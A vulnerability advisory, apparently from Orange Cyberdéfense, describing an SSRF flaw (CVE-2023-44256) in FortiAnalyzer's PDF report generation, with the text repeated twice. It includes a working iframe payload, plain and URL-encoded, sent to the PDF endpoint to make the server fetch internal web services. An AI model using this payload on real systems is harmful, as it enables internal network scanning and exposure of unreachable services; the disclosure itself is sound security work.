Overview
PDF report generation of the FortiAnalyzer contains a vulnerability that allows remote logged user to make the FortiAnalyzer execute web requests to FortiAnalyzer's local and reachable network web services. The web responses of these requests will be displayed in the rendered PDF.
Details
By performing this Server Side Request Forgery (SSRF), attacker can gain access to information and web service that are normally not accessible. The attacker can also anonymize his malicious actions by having them executed by the FortiAnalyzer.
Proof of Concept
On the FortiAnalyzer, access to the FortiViews functionality then to Top Threat allows the generation of a PDF summarizing the data viewed.
The generation of the PDF notably involves sending HTML data in POST to the entry point /p/fortiview/download/pdf/
.
Following receipt of this data. The server returns a PDF file containing the HTML data sent. The generated PDF contains in particular in its metadata the software solution used for the generation of the PDF from the HTML code and its version: wkhtmltopdf 0.12.6-dev
This software solution is outdated and affected by a public vulnerability. This weakness was used to insert HTML code which will be interpreted by the server to request neighboring resources (local network web services) and display obtained responses in the rendered PDF.
HTML code sent as POST parameter:
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
To be correctly interpreted by the PDF generator, this code must be encoded in URL format:
%31%39%38%2e%31%39%2e%33%39%2e%31%32%30%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%31%32%30%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%31%34%37%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%31%34%37%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%31%35%35%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%31%35%35%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%32%31%34%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%32%31%34%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%32%32%39%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%32%32%39%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%32%34%38%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%32%34%38%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a
The HTML code is interpreted by the server-side PDF generator, which requests the specified web resources and then inserts obtained responses into the generated PDF, which allows the attacker to scan the neighboring web services (or any network reachable by the FortiAnalyzer).
The above evidence exposes obtaining multiple valid responses from servers in the attacked FortiAnalyzer's local network.
Solution
Security patch
Upgrade to fixed version, as described in Fortinet Security Advisory
References
https://nvd.nist.gov/vuln/detail/CVE-2023-44256
https://www.fortiguard.com/psirt/FG-IR-19-039
Credits
Mickael Dorigny at Orange Cyberdéfense
For Hélène Saliou, Frédéric Prevost, François-Xavier Picard at Orange group
Orange CERT-CC at Orange group
Timeline
Date reported: May 31, 2023
Date fixed: October 10, 2023
Overview
PDF report generation of the FortiAnalyzer contains a vulnerability that allows remote logged user to make the FortiAnalyzer execute web requests to FortiAnalyzer's local and reachable network web services. The web responses of these requests will be displayed in the rendered PDF.
Details
By performing this Server Side Request Forgery (SSRF), attacker can gain access to information and web service that are normally not accessible. The attacker can also anonymize his malicious actions by having them executed by the FortiAnalyzer.
Proof of Concept
On the FortiAnalyzer, access to the FortiViews functionality then to Top Threat allows the generation of a PDF summarizing the data viewed.
The generation of the PDF notably involves sending HTML data in POST to the entry point
/p/fortiview/download/pdf/
.Following receipt of this data. The server returns a PDF file containing the HTML data sent. The generated PDF contains in particular in its metadata the software solution used for the generation of the PDF from the HTML code and its version:
wkhtmltopdf 0.12.6-dev
This software solution is outdated and affected by a public vulnerability. This weakness was used to insert HTML code which will be interpreted by the server to request neighboring resources (local network web services) and display obtained responses in the rendered PDF.
HTML code sent as POST parameter:
To be correctly interpreted by the PDF generator, this code must be encoded in URL format:
The HTML code is interpreted by the server-side PDF generator, which requests the specified web resources and then inserts obtained responses into the generated PDF, which allows the attacker to scan the neighboring web services (or any network reachable by the FortiAnalyzer).
The above evidence exposes obtaining multiple valid responses from servers in the attacked FortiAnalyzer's local network.
Solution
Security patch
Upgrade to fixed version, as described in Fortinet Security Advisory
References
https://nvd.nist.gov/vuln/detail/CVE-2023-44256
https://www.fortiguard.com/psirt/FG-IR-19-039
Credits
Mickael Dorigny at Orange Cyberdéfense
For Hélène Saliou, Frédéric Prevost, François-Xavier Picard at Orange group
Orange CERT-CC at Orange group
Timeline
Date reported: May 31, 2023
Date fixed: October 10, 2023